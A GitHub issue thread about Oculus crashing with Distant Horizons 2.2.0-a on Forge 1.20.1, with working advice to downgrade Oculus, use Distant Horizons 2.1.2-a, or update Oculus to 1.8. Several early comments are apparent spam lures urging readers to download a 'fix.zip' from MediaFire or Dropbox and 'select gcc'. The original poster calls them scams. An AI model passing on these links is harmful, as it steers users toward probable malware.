### ISSUE TITLE
Oculus Crash with Distant Horizons 2.2.0-a

### ISSUE THREAD

**Issue by HoodBlah** [Asek3/Oculus#683]
### Minecraft Version

Forge 1.20.1

### Oculus Version

1.7.0

### Rubidium / Embeddium Version

Embeddium 0.3.30

### Operating System

Windows 11

### What is your GPU?

Nvidia RTX 4070

### Java Version

jdk 17

### Reproduction Steps

1. Install latest oculus, embeddium, distant horizon
2. Crash on startup

### Crash Report file and latest.log
Full modpack:
[debug.log](https://github.com/user-attachments/files/16742334/debug.log)
[latest.log](https://github.com/user-attachments/files/16742335/latest.log)

Just oculus, embeddium, distant horizon:
[debug.log](https://github.com/user-attachments/files/16742341/debug.log)
[latest.log](https://github.com/user-attachments/files/16742342/latest.log)

### Additional context

Issue reported to Distant Horizon as well:
https://gitlab.com/jeseibel/distant-horizons/-/issues/789

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=0
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by HoodBlah** [comment]
I'm not going to your random ahh links scammers

**Comment by HnuterZ** [comment]
Hello. (Sorry for the bad writing, I have to improve)
For now, there isn't a patch for this problem.
The solution can be to not play with **Distant Horizon** or the **Oculus** mod.
**If you still want to use all of the mods** (oculus, embeddium, distant horizon) change the version of oculus to _**Oculus mc1.20.1-1.6.15a**_

Note :
There is no real fix right now. The problem will be solve when the Oculus team update the mod. For now, they have this small text on there file page of the latest version of the mod.

> Upstream to Iris 1.7.0 (Main feature is Distant Horizon 2.0.4+ support, **which is not released yet**)

**Comment by HoodBlah** [comment]
Thanks, downgrading worked

**Comment by TqLxQuanZ** [comment]
Having same issue as well, is there any plan on updating the oculus version for matching with newest version of DH?

**Comment by MAXimized490** [comment]
Also having this issue. This is pretty unfortunate since Oculus is really the only way to have shaders on Forge 1.20.1 and DH 2.2.0 fixes some pretty annoying bugs.

**Comment by HnuterZ** [comment]
Yes it is sad, but they know this issue and will fix it _(someday)_. For now, only downgrading Oculus or Distant Horizon mod fix this issue.

**Comment by zarthisius** [comment]
Can someone recommend me a version combination of DH and Oculus that allow any shaders to work correctly? I have been trying different version combinations along with different shader packs but keep getting random artifacts when Shaders are applied
Seems like Oculus mc1.20.1-1.6.15a is the stable version for now but which DH version should I use along with it?

**Comment by mpustovoi** [comment]
For now on Forge 1.20.1 you can use [Oculus mc1.20.1-1.7.0](https://modrinth.com/mod/oculus/version/1.20.1-1.7.0) & [Distant Horizons 2.1.2-a](https://modrinth.com/mod/distanthorizons/version/2.1.2-a-1.20.1). It's working fine.
If you try to use DH v2.2.X with any version of Oculus, you will get a crash.

**Comment by zarthisius** [comment]
Just tried this combination and it works. Thanks a lot

> On Forge 1.20.1 I have [Oculus mc1.20.1-1.7.0](https://modrinth.com/mod/oculus/version/1.20.1-1.7.0) & [Distant Horizons 2.1.2-a](https://modrinth.com/mod/distanthorizons/version/2.1.2-a-1.20.1) working fine. If you try to use DH v2.2.X with any version of Oculus, you will get a crash.

**Comment by mpustovoi** [comment]
This will most likely not be fixed in any time soon, since the author hasn't made any contributions since the early April.

**Comment by erialsan** [comment]
Some issue

**Comment by mpustovoi** [comment]
Recently there was a life-saving pull request: https://github.com/Asek3/Oculus/pull/702 .
Perhaps an update with a fix will be released soon.

**Comment by dima-dencep** [comment]
Will be fixed in a future release

**Comment by WilliamPas** [comment]
Adding a fix comment for other people who may be looking to add Distant Horizons to their install of the Better Minecraft 4 modpack.

Updating Oculus from 1.7 to 1.8 allowed me to launch the game and load into a server, from crashing. I'll update this if I run into any crashes within the next few days.
